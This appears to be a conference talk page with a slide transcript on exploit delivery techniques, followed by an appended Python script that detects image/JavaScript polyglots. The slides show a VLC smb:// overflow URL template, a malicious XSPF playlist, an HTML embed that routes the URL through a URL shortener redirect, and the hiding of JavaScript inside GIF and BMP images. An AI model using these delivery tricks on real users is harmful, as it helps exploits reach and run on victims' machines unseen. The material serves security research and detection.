Innovative Exploit Delivery
Behind every successful exploit is a good delivery mechanism. This talk combines my research in exploit writing, browser and PDF exploitation, web hacking and old school data representation techniques, bringing you a slew of creative and innovative tricks and techniques to send exploits successfully to the victim's doorstep.

Never before has the fine art of packaging been more important when it comes to exploit delivery. Advances in HTML standards, newer trends with HTTP, new techniques of consuming web resources and multiple ways of data representation make it possible to come up with tricks like "Javascript chameleons", "shortened exploits", "exploitation by painting" and other creative techniques.

Published in: Technology
1 Comment
  • Yeah, but can you exploit it on latest Linux amd64 with all the new gcc patches, PIE, stack cookies, ASLR, heap protection, etc? No...

Transcript

  • 1. INNOVATIVE EXPLOIT DELIVERY
    Saumil Shah, net-square. HITB2012KUL.
  • 2. # who am i
    Saumil Shah, CEO Net-Square.
    • Hacker, Speaker, Trainer, Author - 15 yrs in Infosec.
    • M.S. Computer Science, Purdue University.
    • saumil@net-square.com
    • LinkedIn: saumilshah
    • Twitter: @therealsaumil
  • 3. My area of work
    Penetration Testing, Reverse Engineering, Exploit Writing, New Attack Research, Offensive Security, Defense, Conference Speaker, "Eyes and ears open".
  • 4. When two forces combine... Web Hacking + Binary Exploits.
  • 5. SNEAKY. LETHAL.
  • 6. (slide image, no text)
  • 7. 302, IMG, JS, HTML5.
  • 8. (slide image, no text)
  • 9. VLC smb overflow
    • smb://example.com@0.0.0.0/foo/#{AAAA AAAA....}
    • Classic Stack Overflow.
  • 10. VLC XSPF file
    <?xml version="1.0" encoding="UTF-8"?>
    <playlist version="1" xmlns="http://xspf.org/ns/0/" xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/">
      <title>Playlist</title>
      <trackList>
        <track>
          <location>smb://example.com@0.0.0.0/foo/#{AAAAAAAA....}</location>
          <extension application="http://www.videolan.org/vlc/playlist/0">
            <vlc:id>0</vlc:id>
          </extension>
        </track>
      </trackList>
    </playlist>
  • 11. Alpha Encoded Tiny ZOMFG Exploit URL.
  • 12. 100% Pure Alphanum!
  • 13. VLC smb overflow - HTMLized!!
    <embed type="application/x-vlc-plugin" width="320" height="200" target="http://tinyurl.com/ycctrzf" id="vlc" />
  • 14. 301 Redirect from tinyurl
    HTTP/1.1 301 Moved Permanently
    X-Powered-By: PHP/5.2.12
    Location: smb://example.com@0.0.0.0/foo/#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAj4?...}
    Content-type: text/html
    Content-Length: 0
    Connection: close
    Server: TinyURL/1.6
  • 15. (slide image, no text)
  • 16. Exploits as Images - 1
    • Grayscale encoding (0-255).
    • 1 pixel = 1 character.
    • Perfectly valid image.
    • Decode and Execute!
  • 17. (slide image, no text)
  • 18. I'm an evil Javascript. I'm an innocent image.
  • 19. <CANVAS>
  • 20. c) no eval()
  • 21. Same Same No Different!
    var a = eval(str);
    a = (new Function(str))();
  • 22. d) IMAJS
  • 23. IMAJS - Seeing is Believing.
  • 24. Browser Support for IMAJS-GIF
    Height Width  | Browser/Viewer   | Image Renders? | Javascript Executes?
    2f 2a 00 00   | Firefox          | yes            | yes
    2f 2a 00 00   | Safari           | yes            | yes
    2f 2a 00 00   | IE               | no             | yes
    2f 2a 00 00   | Chrome           | yes            | yes
    2f 2a 00 00   | Preview.app      | yes            | -
    2f 2a 00 00   | XP Image Viewer  | no             | -
    2f 2a 00 00   | Win 7 Preview    | yes            | -
  • 25. Browser Support for IMAJS-BMP
    Height Width  | Browser/Viewer   | Image Renders? | Javascript Executes?
    2f 2a 00 00   | Firefox          | yes            | yes
    2f 2a 00 00   | Safari           | yes            | yes
    2f 2a 00 00   | IE               | yes            | yes
    2f 2a 00 00   | Chrome           | yes            | yes
    2f 2a 00 00   | Opera            | yes            | yes
    2f 2a 00 00   | Preview.app      | yes            | -
    2f 2a 00 00   | XP Image Viewer  | yes            | -
    2f 2a 00 00   | Win 7 Preview    | yes            | -
  • 26. e) The αq exploit
  • 27. Encode using Alpha channel.
  • 28. Demo: IMAJS αq FTW!
  • 29. f) ONE LAST DEMO!!!
  • 30. The FUTURE? HTML5 Video, SVG, WebGL, Mobile Browsers.
  • 31. KTHXBAI. See you in 2013??
    saumil@net-square.com | @therealsaumil
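The IMAJS tables on slides 24 and 25 give the defender one concrete artifact to look for: an image whose GIF dimension fields or BMP file-size field are the bytes 2f 2a 00 00, i.e. the ASCII "/*" that makes the rest of the header a JavaScript comment. The following Python triage check is an added example, not code from the talk or from net-square; it parses only the GIF logical screen descriptor and the BMP file header, and the sample headers, function names and the zero-dimension and size-mismatch heuristics are my own constructions.

```python
import struct

# 0x2f 0x2a: the two header bytes the IMAJS-GIF and IMAJS-BMP tables list.
COMMENT_OPEN = b"/*"


def gif_header(data):
    """Parse the GIF signature and logical screen descriptor.

    Returns (width, height) as stored (little-endian), or None if the
    data does not start with a GIF signature.
    """
    if len(data) < 10 or data[:6] not in (b"GIF87a", b"GIF89a"):
        return None
    return struct.unpack_from("<HH", data, 6)


def bmp_header(data):
    """Parse the BMP magic and the declared file size; None if not a BMP."""
    if len(data) < 6 or data[:2] != b"BM":
        return None
    return struct.unpack_from("<I", data, 2)[0]


def polyglot_indicators(data):
    """Return the reasons an image header looks like an image/JavaScript
    polyglot. An empty list means nothing fired. Only the header is read,
    so treat the result as a triage signal to pull the file for review,
    not as proof of malicious content."""
    reasons = []

    dims = gif_header(data)
    if dims is not None:
        width, height = dims
        if data[6:8] == COMMENT_OPEN:
            reasons.append("GIF width field 0x%04x is the bytes '/*'" % width)
        if width == 0 or height == 0:
            reasons.append("GIF declares a zero-sized canvas (%dx%d)" % (width, height))

    size = bmp_header(data)
    if size is not None:
        if data[2:4] == COMMENT_OPEN:
            reasons.append("BMP file-size field 0x%08x begins with the bytes '/*'" % size)
        if size != len(data):
            reasons.append("BMP declares %d bytes but the file is %d bytes" % (size, len(data)))

    return reasons


# Constructed sample headers (not files from the talk): a 10x10 GIF89a
# header, a GIF header whose width/height bytes are 2f 2a 00 00, a BMP
# header that declares its true length, and a BMP header whose size
# field is the same 2f 2a 00 00 pattern.
BENIGN_GIF = b"GIF89a" + struct.pack("<HH", 10, 10) + b"\x80\x00\x00"
POLYGLOT_GIF = b"GIF89a" + b"\x2f\x2a\x00\x00" + b"\x80\x00\x00"
BENIGN_BMP = b"BM" + struct.pack("<I", 14) + bytes(8)
POLYGLOT_BMP = b"BM" + b"\x2f\x2a\x00\x00" + bytes(8)


def triage(samples):
    """Run the check over a name -> bytes mapping; return names that fired."""
    flagged = {}
    for name, data in samples.items():
        hits = polyglot_indicators(data)
        if hits:
            flagged[name] = hits
    return flagged


if __name__ == "__main__":
    report = triage({
        "benign.gif": BENIGN_GIF,
        "suspect.gif": POLYGLOT_GIF,
        "benign.bmp": BENIGN_BMP,
        "suspect.bmp": POLYGLOT_BMP,
    })
    for name, hits in report.items():
        print(name)
        for hit in hits:
            print("  -", hit)
```

The check deliberately reads the header only: a mail gateway or web proxy can run it on the first few bytes of every image without decoding the picture, and the zero-dimension and size-mismatch heuristics catch the same pattern when the comment opener is placed in a different header field.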